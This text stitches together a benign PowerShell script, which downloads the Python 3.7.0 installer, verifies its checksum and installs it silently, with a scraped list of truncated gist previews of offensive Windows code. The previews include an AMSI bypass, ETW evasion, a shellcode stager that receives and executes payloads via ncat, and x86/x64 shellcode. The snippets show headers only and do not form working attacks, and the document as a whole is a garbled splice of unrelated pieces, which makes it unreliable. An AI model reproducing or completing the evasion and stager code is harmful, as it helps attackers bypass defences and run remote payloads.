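# Bootstrap a per-user Python 3.7.0 on Windows: fetch the official installer
# over TLS 1.2, verify its digest, then run it unattended.
#
# The expected SHA-256 must be taken from the checksum python.org publishes for
# this release; the installer is refused (fail-closed) if the digest differs,
# so a substituted or corrupted download is never executed.
$ExpectedSha256 = "<SHA256-PLACEHOLDER-REPLACE-WITH-PUBLISHED-PYTHON-ORG-DIGEST>"

$InstallerDir  = "C:/temp/"
$InstallerPath = "c:/temp/python-3.7.0.exe"
$InstallerUri  = "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe"

# -Force: a plain `mkdir` errors out when the directory already exists.
New-Item -ItemType Directory -Path $InstallerDir -Force | Out-Null

# Older PowerShell hosts default to SSL3/TLS1.0; force TLS 1.2 for the download.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Invoke-WebRequest -Uri $InstallerUri -OutFile $InstallerPath

# Integrity check: compare the downloaded file against the expected digest
# before handing it to the shell. String comparison in PowerShell is
# case-insensitive, so hex case does not matter.
$ActualSha256 = (Get-FileHash -Path $InstallerPath -Algorithm SHA256).Hash
if ($ActualSha256 -ne $ExpectedSha256) {
    throw "Checksum mismatch for $InstallerPath: expected $ExpectedSha256, got $ActualSha256"
}

# /quiet: unattended; InstallAllUsers=0: per-user install; PrependPath=1: add
# python to PATH; Include_test=0: skip the test suite.
& $InstallerPath /quiet InstallAllUsers=0 PrependPath=1 Include_test=0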
| // Exception-Based AMSI Bypass | |
| // by aaaddress1@chroot.org | |
| #include <amsi.h> | |
| #include <iostream> | |
| #include <Windows.h> | |
| #pragma comment(lib, "amsi.lib") | |
| #pragma comment(lib, "ole32.lib") | |
| #pragma warning( disable : 4996 ) | |
| #define AMSIPROJECTNAME L"scanner" |
| // CLR Hosting, by aaaddress1@chroot.org | |
| // | |
| // it's a new edition rewrite for .NET(4+) COM interface | |
| // original from github.com/etormadiv/HostingCLR | |
| // & blog.xpnsec.com/hiding-your-dotnet-etw | |
| // | |
| // this PoC supports the following .NET entry: | |
| // >>>> static void Main(string[] args); | |
| // | |
| #include <stdio.h> |
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
| // ETW CLR Tracker, by aaaddress1@chroot.org | |
| // rewrite from post "Hiding your .NET - ETW" | |
| // URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
| #define AssemblyDCStart_V1 155 | |
| #define AssemblyLoad_V1 154 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> |
| // simple stager, by aaaddress1@chroot.org | |
| // using ncat to send shellcode payload, recv & execute. | |
| #include <WS2tcpip.h> | |
| #include <stdio.h> | |
| #include <shlobj.h> | |
| #include <Windows.h> | |
| #include <shlwapi.h> | |
| #include <winsock2.h> | |
| #pragma warning(disable:4996) | |
| #pragma comment(lib, "ws2_32.lib") |
| // [Experiment] swich IME to Traditional Chinese | |
| // $ g++ -m32 -static inputLockToZhTW.cpp && a | |
| // test on League of Legends (TW) client, but got ignored :( | |
| // by aaaddress1@chroot.org | |
| #include <windows.h> | |
| #include <iostream> | |
| int main(void) { | |
| for (char buf[64]; ; Sleep(150)) { | |
| GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
| // once found that LOL client is on the top, and send IME change requests |
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
| # x96_shellcode.py | |
| # ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
| # by aaaddress1@chroot.org | |
| ''' | |
| entry: | |
| call $+5 | |
| mov ax, cs | |
| sub ax, 23h | |
| je retTo32b | |
| nop |
| ; x96 shellcode (x32+x64) by aaaddress1@chroot.org | |
| ; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
| section .text | |
| bits 32 | |
| _main: | |
| call entry | |
| entry: | |
| mov ax, cs | |
| sub ax, 0x23 | |
| jz retTo32b |